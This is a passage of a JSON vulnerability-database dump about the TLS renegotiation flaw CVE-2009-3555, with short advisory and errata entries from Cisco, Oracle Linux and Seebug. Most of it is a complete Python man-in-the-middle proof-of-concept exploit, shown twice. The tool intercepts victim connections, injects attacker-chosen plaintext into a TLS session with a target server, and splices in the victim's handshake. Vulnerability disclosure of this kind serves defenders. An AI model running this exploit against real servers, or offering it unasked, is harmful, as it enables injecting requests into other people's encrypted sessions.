reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Nov 09, 2009 Document ID: 111046\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkr4TCsACgkQ86n/Gc8U/uDNWgCfYptXVZhz0qn2DvRh2zUtZ5EF\r\nOS4AoJediPm3/t9XqYIdrjR5PNP25iY/\r\n=SkAu\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12600", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T15:57:49", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67231", "id": "SSV:67231", "title": "TLS Renegotiation Vulnerability PoC", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n\r\n######################################\r\n# #\r\n# RedTeam Pentesting GmbH #\r\n# kontakt@redteam-pentesting.de #\r\n# http://www.redteam-pentesting.de #\r\n# #\r\n######################################\r\n\r\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\r\n\r\n# License\r\n# -------\r\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\r\n\r\n# Timeline\r\n# --------\r\n# 2009-12-21 initial public release\r\n\r\n# Known Issues\r\n# ------------\r\n# Firefox: if it fails connecting to a TLS site too often, falls back to\r\n# issuing SSLv2 ClientHello only until browser is restarted\r\n#\r\n# wget: attempts SSLv2 ClientHello by default\r\n\r\n# References\r\n# ----------\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n# http://www.phonefactor.com/sslgap\r\n# http://www.extendedsubset.com/\r\n# http://www.g-sec.lu/practicaltls.pdf\r\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\r\n\r\nimport tlslite\r\nimport tlslite.api\r\nimport tlslite.messages\r\nimport tlslite.constants\r\nimport struct\r\nimport socket\r\nimport threading\r\nimport array\r\nimport sys\r\nimport optparse\r\n\r\n\r\nif not hasattr(threading.Thread, 'name'):\r\n # emulate python 2.6 threading module for earlier versions\r\n threading.current_thread = threading.currentThread\r\n setattr(threading.Thread, 'name',\r\n property(threading.Thread.getName, threading.Thread.setName))\r\n\r\ndef forward(sock1, sock2):\r\n sock1.settimeout(1.0)\r\n while True:\r\n try:\r\n data = sock1.recv(4096)\r\n if not data:\r\n return\r\n sock2.send(data)\r\n except socket.error, ex_error:\r\n if ex_error[0] == 104: # Connection reset by peer\r\n return\r\n except socket.timeout, ex_timeout:\r\n pass\r\n\r\n\r\nclass MessageWrapper(object):\r\n def __init__(self, version = (3, 1), ssl2 = False):\r\n self.contentType = tlslite.messages.ContentType.handshake\r\n self.ssl2 = ssl2\r\n self.client_version = version\r\n\r\n def setType(self, type):\r\n self.contentType = type\r\n\r\n def addBytes(self, bytes):\r\n self.bytes = bytes\r\n\r\n def write(self, trial=False):\r\n if trial:\r\n raise Exception('Unsupported')\r\n return array.array('B', self.bytes)\r\n\r\ndef send_record(sock, msg_type, version_major, version_minor, record):\r\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\r\n if type(record) != str:\r\n msg += record.tostring()\r\n else:\r\n msg += record\r\n sock.send(msg)\r\n\r\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\r\n msg = MessageWrapper(version)\r\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\r\n msg.setType(type)\r\n for dummy in sslsock._sendMsg(msg, True):\r\n pass\r\n\r\ndef decrypt_record(sslsock, type, recordbytes):\r\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\r\n pass\r\n return result\r\n\r\ndef recv_record(sock):\r\n try:\r\n header = sock.recv(5)\r\n if not header:\r\n return None, None, None, None\r\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\r\n record = ''\r\n while len(record) != msg_length:\r\n record += sock.recv(msg_length - len(record))\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n except socket.error, ex:\r\n if ex[0] == 104: # Connection reset by peer\r\n return\r\n\r\ndef recv_clienthello(sock):\r\n header_bytes = []\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\r\n if header_bytes[0] & 0x80:\r\n # Version 2.0 Client "Record Layer"\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\r\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\r\n msg_version_major = 2\r\n msg_version_minor = 0\r\n msg_type = tlslite.constants.ContentType.handshake\r\n record = sock.recv(msg_length)\r\n else:\r\n header = sock.recv(4)\r\n msg_type = header_bytes[0]\r\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\r\n record = sock.recv(msg_length)\r\n\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n\r\ndef send_hello_request(sock):\r\n sock.send("\\x16" # Record Layer: Handshake Message\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x04" # Record Layer Length: 4\r\n +"\\x00" # Handshake Message Type: Hello Request\r\n +"\\x00\\x00\\x00") # Handshake Message Length: 0\r\n\r\ndef send_protocol_version_alert(sock):\r\n sock.send("\\x15" # Record Layer: Alert"\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x02" # Record Layer Length: 2\r\n +"\\x00" # Alert Message: fatal\r\n +"\\x46") # Alert Message: protocol version\r\n\r\n\r\ndef handle_victim(victim, options, mitmcount):\r\n\r\n if options.one_shot and mitmcount != 0:\r\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n t1 = threading.Thread(target=forward, args=(sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sock))\r\n t2.start()\r\n\r\n t1.join()\r\n sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n return\r\n\r\n # obtain initial "client hello" message\r\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\r\n if msg_version_major == 2:\r\n print threading.current_thread().name, "client sent SSLv2 client hello message, exiting thread"\r\n return\r\n\r\n tls_version = (msg_version_major, msg_version_minor)\r\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\r\n resume_session = (session_id_length != 0)\r\n if resume_session:\r\n print threading.current_thread().name, "client attempting to resume session"\r\n\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n\r\n sslsock = tlslite.api.TLSConnection(sock)\r\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\r\n handshake_settings.minVersion = tls_version\r\n handshake_settings.maxVersion = tls_version\r\n sslsock.handshakeClientCert(settings = handshake_settings)\r\n\r\n # inject prefix\r\n sslsock.write(options.inject)\r\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\r\n\r\n # send original "client hello" message over the encrypted channel\r\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\r\n\r\n # now receive serveral TLS messages from the server, decrypt them, and forward\r\n # them to the client, until the server sends "server hello done"\r\n # these messages include "server hello", "certificate", "server key exchange",\r\n # unless the client is trying to resume a previous session\r\n print threading.current_thread().name, "about to receive server handshake messages"\r\n server_handshake_done = False\r\n while not server_handshake_done:\r\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\r\n if result:\r\n result = decrypt_record(sslsock, msg_type, result)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n if result[0] == 0x0e: # server hello done - should terminate handshake\r\n server_handshake_done = True\r\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\r\n server_handshake_done = True\r\n else:\r\n print threading.current_thread().name, 'receive from server failed, exiting thread'\r\n return\r\n print threading.current_thread().name, "server handshake done"\r\n\r\n\r\n # now its the the client's turn to send some messages, e.g.\r\n # "client key exchange" and "change cipher spec"\r\n print threading.current_thread().name, "about to receive client handshake messages"\r\n handshake_finished = False\r\n while not handshake_finished:\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n print threading.current_thread().name, msg_type\r\n send_encapsulated(sslsock, msg_type, record, tls_version)\r\n if msg_type == 0x14: # change cipher spec\r\n handshake_finished = True\r\n\r\n print threading.current_thread().name, "client handshake done"\r\n\r\n # message after "change cipher spec" must be sent in the "clear"\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\r\n\r\n # server should now send "change cipher spec" message, we decrypt and send that to the victim\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n result = decrypt_record(sslsock, msg_type, record)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n\r\n # finalize handshake\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n if record:\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\r\n else:\r\n sslsock.sock.close()\r\n victim.close()\r\n del sslsock\r\n return\r\n\r\n\r\n\r\n # the rest is just forwarding TLS records between both parties,\r\n # which we cannot interfere with anymore, apart from dropping server\r\n # responses\r\n if options.drop:\r\n sslsock.sock.close()\r\n del sslsock\r\n else:\r\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\r\n t2.start()\r\n\r\n if not options.drop:\r\n t1.join()\r\n sslsock.sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n\r\n\r\n\r\nif __name__ == "__main__":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\r\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\r\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\r\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\r\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\r\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\r\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\r\n parser.add_option('-d', '--drop-responses', dest='drop', action="store_true", default=False, help='drop server responses after renegotiating')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\r\n print 'Exactly one injection option must be specified'\r\n sys.exit(1)\r\n\r\n if options.inject_file:\r\n try:\r\n options.inject = open(options.inject_file, 'r').read()\r\n except IOError, ex:\r\n print ex\r\n sys.exit(1)\r\n\r\n if options.inject_base64:\r\n import base64\r\n try:\r\n options.inject = base64.decodestring(options.inject_base64)\r\n except base64.binascii.Error, ex:\r\n print 'Error decoding base64 data: %s' % ex\r\n sys.exit(1)\r\n\r\n\r\n if not options.listen_port or \\\r\n not options.bind_address or \\\r\n not options.target or \\\r\n not options.inject:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n target = options.target.split(':')\r\n if len(target)==2:\r\n try:\r\n target[1] = int(target[1])\r\n except ValueError:\r\n target[1] = None\r\n if len(target)!=2 or not target[0] or not target[1]:\r\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\r\n sys.exit(1)\r\n\r\n options.target = tuple(target)\r\n\r\n try:\r\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n listensocket.bind((options.bind_address, options.listen_port))\r\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\r\n except socket.error, ex:\r\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\r\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listensocket.listen(5)\r\n\r\n mitmcount = 0\r\n\r\n while True:\r\n try:\r\n victim, victimaddr = listensocket.accept()\r\n print 'New connection from %s:%u' % victimaddr\r\n\r\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\r\n mitmcount += 1\r\n\r\n except KeyboardInterrupt, ex:\r\n print '\\nAborted by user, exiting...'\r\n listensocket.close()\r\n sys.exit(1)\r\n\r\n\n ", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67231"}, {"lastseen": "2017-11-19T18:22:14", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-12-21T00:00:00", "published": "2009-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18637", "id": "SSV:18637", "type": "seebug", "title": "TLS Renegotiation Vulnerability PoC Exploit", "sourceData": "\n #!/usr/bin/env python\r\n\r\n######################################\r\n# #\r\n# RedTeam Pentesting GmbH #\r\n# kontakt@redteam-pentesting.de #\r\n# http://www.redteam-pentesting.de #\r\n# #\r\n######################################\r\n\r\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\r\n\r\n# License\r\n# -------\r\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\r\n\r\n# Timeline\r\n# --------\r\n# 2009-12-21 initial public release\r\n\r\n# Known Issues\r\n# ------------\r\n# Firefox: if it fails connecting to a TLS site too often, falls back to\r\n# issuing SSLv2 ClientHello only until browser is restarted\r\n#\r\n# wget: attempts SSLv2 ClientHello by default\r\n\r\n# References\r\n# ----------\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n# http://www.phonefactor.com/sslgap\r\n# http://www.extendedsubset.com/\r\n# http://www.g-sec.lu/practicaltls.pdf\r\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\r\n\r\nimport tlslite\r\nimport tlslite.api\r\nimport tlslite.messages\r\nimport tlslite.constants\r\nimport struct\r\nimport socket\r\nimport threading\r\nimport array\r\nimport sys\r\nimport optparse\r\n\r\n\r\nif not hasattr(threading.Thread, 'name'):\r\n # emulate python 2.6 threading module for earlier versions\r\n threading.current_thread = threading.currentThread\r\n setattr(threading.Thread, 'name',\r\n property(threading.Thread.getName, threading.Thread.setName))\r\n\r\ndef forward(sock1, sock2):\r\n sock1.settimeout(1.0)\r\n while True:\r\n try:\r\n data = sock1.recv(4096)\r\n if not data:\r\n return\r\n sock2.send(data)\r\n except socket.error, ex_error:\r\n if ex_error[0] == 104: # Connection reset by peer\r\n return\r\n except socket.timeout, ex_timeout:\r\n pass\r\n\r\n\r\nclass MessageWrapper(object):\r\n def __init__(self, version = (3, 1), ssl2 = False):\r\n self.contentType = tlslite.messages.ContentType.handshake\r\n self.ssl2 = ssl2\r\n self.client_version = version\r\n\r\n def setType(self, type):\r\n self.contentType = type\r\n\r\n def addBytes(self, bytes):\r\n self.bytes = bytes\r\n\r\n def write(self, trial=False):\r\n if trial:\r\n raise Exception('Unsupported')\r\n return array.array('B', self.bytes)\r\n\r\ndef send_record(sock, msg_type, version_major, version_minor, record):\r\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\r\n if type(record) != str:\r\n msg += record.tostring()\r\n else:\r\n msg += record\r\n sock.send(msg)\r\n\r\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\r\n msg = MessageWrapper(version)\r\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\r\n msg.setType(type)\r\n for dummy in sslsock._sendMsg(msg, True):\r\n pass\r\n\r\ndef decrypt_record(sslsock, type, recordbytes):\r\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\r\n pass\r\n return result\r\n\r\ndef recv_record(sock):\r\n try:\r\n header = sock.recv(5)\r\n if not header:\r\n return None, None, None, None\r\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\r\n record = ''\r\n while len(record) != msg_length:\r\n record += sock.recv(msg_length - len(record))\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n except socket.error, ex:\r\n if ex[0] == 104: # Connection reset by peer\r\n return\r\n\r\ndef recv_clienthello(sock):\r\n header_bytes = []\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\r\n if header_bytes[0] & 0x80:\r\n # Version 2.0 Client "Record Layer"\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\r\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\r\n msg_version_major = 2\r\n msg_version_minor = 0\r\n msg_type = tlslite.constants.ContentType.handshake\r\n record = sock.recv(msg_length)\r\n else:\r\n header = sock.recv(4)\r\n msg_type = header_bytes[0]\r\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\r\n record = sock.recv(msg_length)\r\n\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n\r\ndef send_hello_request(sock):\r\n sock.send("\\x16" # Record Layer: Handshake Message\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x04" # Record Layer Length: 4\r\n +"\\x00" # Handshake Message Type: Hello Request\r\n +"\\x00\\x00\\x00") # Handshake Message Length: 0\r\n\r\ndef send_protocol_version_alert(sock):\r\n sock.send("\\x15" # Record Layer: Alert"\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x02" # Record Layer Length: 2\r\n +"\\x00" # Alert Message: fatal\r\n +"\\x46") # Alert Message: protocol version\r\n\r\n\r\ndef handle_victim(victim, options, mitmcount):\r\n\r\n if options.one_shot and mitmcount != 0:\r\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n t1 = threading.Thread(target=forward, args=(sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sock))\r\n t2.start()\r\n\r\n t1.join()\r\n sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n return\r\n\r\n # obtain initial "client hello" message\r\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\r\n if msg_version_major == 2:\r\n print threading.current_thread().name, "client sent SSLv2 client hello message, exiting thread"\r\n return\r\n\r\n tls_version = (msg_version_major, msg_version_minor)\r\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\r\n resume_session = (session_id_length != 0)\r\n if resume_session:\r\n print threading.current_thread().name, "client attempting to resume session"\r\n\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n\r\n sslsock = tlslite.api.TLSConnection(sock)\r\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\r\n handshake_settings.minVersion = tls_version\r\n handshake_settings.maxVersion = tls_version\r\n sslsock.handshakeClientCert(settings = handshake_settings)\r\n\r\n # inject prefix\r\n sslsock.write(options.inject)\r\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\r\n\r\n # send original "client hello" message over the encrypted channel\r\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\r\n\r\n # now receive serveral TLS messages from the server, decrypt them, and forward\r\n # them to the client, until the server sends "server hello done"\r\n # these messages include "server hello", "certificate", "server key exchange",\r\n # unless the client is trying to resume a previous session\r\n print threading.current_thread().name, "about to receive server handshake messages"\r\n server_handshake_done = False\r\n while not server_handshake_done:\r\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\r\n if result:\r\n result = decrypt_record(sslsock, msg_type, result)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n if result[0] == 0x0e: # server hello done - should terminate handshake\r\n server_handshake_done = True\r\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\r\n server_handshake_done = True\r\n else:\r\n print threading.current_thread().name, 'receive from server failed, exiting thread'\r\n return\r\n print threading.current_thread().name, "server handshake done"\r\n\r\n\r\n # now its the the client's turn to send some messages, e.g.\r\n # "client key exchange" and "change cipher spec"\r\n print threading.current_thread().name, "about to receive client handshake messages"\r\n handshake_finished = False\r\n while not handshake_finished:\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n print threading.current_thread().name, msg_type\r\n send_encapsulated(sslsock, msg_type, record, tls_version)\r\n if msg_type == 0x14: # change cipher spec\r\n handshake_finished = True\r\n\r\n print threading.current_thread().name, "client handshake done"\r\n\r\n # message after "change cipher spec" must be sent in the "clear"\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\r\n\r\n # server should now send "change cipher spec" message, we decrypt and send that to the victim\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n result = decrypt_record(sslsock, msg_type, record)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n\r\n # finalize handshake\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n if record:\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\r\n else:\r\n sslsock.sock.close()\r\n victim.close()\r\n del sslsock\r\n return\r\n\r\n\r\n\r\n # the rest is just forwarding TLS records between both parties,\r\n # which we cannot interfere with anymore, apart from dropping server\r\n # responses\r\n if options.drop:\r\n sslsock.sock.close()\r\n del sslsock\r\n else:\r\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\r\n t2.start()\r\n\r\n if not options.drop:\r\n t1.join()\r\n sslsock.sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n\r\n\r\n\r\nif __name__ == "__main__":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\r\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\r\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\r\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\r\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\r\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\r\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\r\n parser.add_option('-d', '--drop-responses', dest='drop', action="store_true", default=False, help='drop server responses after renegotiating')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\r\n print 'Exactly one injection option must be specified'\r\n sys.exit(1)\r\n\r\n if options.inject_file:\r\n try:\r\n options.inject = open(options.inject_file, 'r').read()\r\n except IOError, ex:\r\n print ex\r\n sys.exit(1)\r\n\r\n if options.inject_base64:\r\n import base64\r\n try:\r\n options.inject = base64.decodestring(options.inject_base64)\r\n except base64.binascii.Error, ex:\r\n print 'Error decoding base64 data: %s' % ex\r\n sys.exit(1)\r\n\r\n\r\n if not options.listen_port or \\\r\n not options.bind_address or \\\r\n not options.target or \\\r\n not options.inject:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n target = options.target.split(':')\r\n if len(target)==2:\r\n try:\r\n target[1] = int(target[1])\r\n except ValueError:\r\n target[1] = None\r\n if len(target)!=2 or not target[0] or not target[1]:\r\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\r\n sys.exit(1)\r\n\r\n options.target = tuple(target)\r\n\r\n try:\r\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n listensocket.bind((options.bind_address, options.listen_port))\r\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\r\n except socket.error, ex:\r\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\r\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listensocket.listen(5)\r\n\r\n mitmcount = 0\r\n\r\n while True:\r\n try:\r\n victim, victimaddr = listensocket.accept()\r\n print 'New connection from %s:%u' % victimaddr\r\n\r\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\r\n mitmcount += 1\r\n\r\n except KeyboardInterrupt, ex:\r\n print '\\nAborted by user, exiting...'\r\n listensocket.close()\r\n sys.exit(1)\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18637", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:25:52", "bulletinFamily": "exploit", "description": "CVE ID: CVE-2009-3555\r\n\r\nProFTPD\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801FTP\u670d\u52a1\u7a0b\u5e8f\u3002\r\n\r\nProFTPD\u7684\u6a21\u5757mod_tls\u5b58\u5728OpenSSL\u7684\u4f1a\u8bdd\u53ef\u91cd\u65b0\u534f\u5546\u9009\u9879\u7684\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u4f1a\u8bdd\u6570\u636e\u6d41\u4e2d\u63d2\u5165\u660e\u6587\u6570\u636e\uff0c\u64cd\u7eb5\u6570\u636e\u4ea4\u4e92\u3002\n\nProFTPD Project ProFTPD 1.3.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nProFTPD Project\r\n---------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.proftpd.org/docs/RELEASE_NOTES-1.3.2c", "modified": "2009-12-15T00:00:00", "published": "2009-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15088", "id": "SSV:15088", "type": "seebug", "title": "ProFTPD TLS\u4f1a\u8bdd\u91cd\u534f\u5546\u660e\u6587\u6570\u636e\u6ce8\u5165\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "unix", "description": "[0.9.7a-9.2]\n- CVE-2009-3555 - support the secure renegotiation RFC (#533125) ", "modified": "2010-03-25T00:00:00", "published": "2010-03-25T00:00:00", "id": "ELSA-2010-0164", "href": "http://linux.oracle.com/errata/ELSA-2010-0164.html", "title": "openssl097a security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "cisco": [{"lastseen": "2019-05-29T15:33:12", "bulletinFamily": "software", "description": "", "modified": "2011-10-20T15:47:58", "published": "2009-11-09T13:00:00", "id": "CISCO-SA-20091109-TLS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20091109-tls", "type": "cisco", "title": "Transport Layer Security Renegotiation Vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T15:33:12", "bulletinFamily": "software", "description": "Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack.\n\nThe vulnerability exists during a TLS renegotiation process. If an attacker can intercept traffic from a client to a TLS server, the attacker could stage a rogue TLS server to intercept that traffic and appear to authenticate the client to what the client thinks is the desired TLS server. The attacker is then able to authenticate to the legitimate TLS server and thus stage a man-in-the-middle attack. However, the attacker would not be able to view the contents of the session and would only be able to inject data or requests into it.\n\nProof-of-concept code that exploits this vulnerability is publicly 